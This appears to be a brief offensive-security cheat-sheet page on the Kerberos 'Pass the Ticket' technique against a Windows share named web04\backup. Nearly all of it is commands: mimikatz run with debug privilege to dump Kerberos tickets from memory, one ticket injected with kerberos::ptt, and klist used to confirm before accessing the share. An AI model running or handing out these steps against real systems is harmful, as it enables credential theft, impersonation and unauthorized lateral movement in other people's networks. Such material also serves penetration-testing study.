Pass The Ticket (PTT)
Pass the Ticket
# Check if our current user has access to resources or not.
ls \\web04\backup
# If access is denied then we will exclate our privilege.
# We will export all tickets.
.\mimikatz.exe "privilege::debug" "log" "sekurlsa::tickets /export" "exit"
# We can look for our interest ticket using the below command.
dir *.kirbi
# Pick any ticket
# example: [0;149674][email protected]
.\mimikatz.exe "kerberos::ptt [0;149674][email protected]" "exit"
# List the ticket in memory to confirm
klist
# Try accessing the resource again.
ls \\web04\backupLast updated